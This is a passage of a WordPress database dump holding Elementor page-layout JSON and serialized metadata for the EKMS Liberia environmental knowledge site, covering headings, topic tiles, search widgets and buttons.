posts\"}],\"isInner\":false}],\"isInner\":false}]'),(19034,2788,'_wp_page_template','default'),(19035,2788,'_elementor_edit_mode','builder'),(19036,2788,'_elementor_template_type','wp-page'),(19037,2788,'_elementor_version','2.7.5'),(19038,2788,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd5d187\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8c7d30\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"80e7dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19041,2789,'_wp_page_template','default'),(19042,2789,'_elementor_edit_mode','builder'),(19043,2789,'_elementor_template_type','wp-page'),(19044,2789,'_elementor_version','2.7.5'),(19045,2789,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd5d187\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8c7d30\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"80e7dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64e3d24\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(19046,87,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:23:\"text_shadow_text_shadow\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:2:{s:15:\"section_general\";a:15:{s:6:\"number\";i:1;s:7:\"columns\";i:1;s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;s:11:\"related_tax\";i:1;s:8:\"post_ids\";i:1;s:12:\"show_excerpt\";i:1;s:11:\"show_author\";i:1;s:9:\"show_date\";i:1;s:13:\"show_comments\";i:1;s:9:\"show_more\";i:1;s:13:\"show_image_as\";i:1;s:10:\"show_terms\";i:1;s:14:\"show_terms_tax\";i:1;s:9:\"show_meta\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:4:{s:19:\"section_title_style\";a:7:{s:11:\"title_color\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;s:28:\"title_typography_font_weight\";i:1;s:15:\"title_alignment\";i:1;s:13:\"title_padding\";i:1;s:12:\"title_margin\";i:1;}s:17:\"section_box_style\";a:3:{s:17:\"box_border_border\";i:1;s:16:\"box_border_width\";i:1;s:16:\"box_border_color\";i:1;}s:21:\"section_content_style\";a:2:{s:10:\"content_bg\";i:1;s:15:\"content_padding\";i:1;}s:24:\"section_terms_link_style\";a:5:{s:32:\"terms_link_typography_typography\";i:1;s:31:\"terms_link_typography_font_size\";i:1;s:33:\"terms_link_typography_font_weight\";i:1;s:19:\"terms_link_bg_color\";i:1;s:16:\"terms_link_color\";i:1;}}s:8:\"advanced\";a:3:{s:15:\"section_effects\";a:2:{s:10:\"_animation\";i:1;s:18:\"animation_duration\";i:1;}s:19:\"_section_background\";a:1:{s:22:\"_background_background\";i:1;}s:14:\"_section_style\";a:1:{s:23:\"_element_vertical_align\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}}'),(19048,2704,'_jetpack_related_posts_cache','a:2:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628897499;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:1610;}i:2;a:1:{s:2:\"id\";i:1544;}}}s:32:\"3ce34b62080969fab6ac9b2650502a91\";a:2:{s:7:\"expires\";i:1628900138;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:1610;}i:2;a:1:{s:2:\"id\";i:1544;}}}}'),(19049,2790,'_wp_page_template','default'),(19050,2790,'_elementor_edit_mode','builder'),(19051,2790,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"s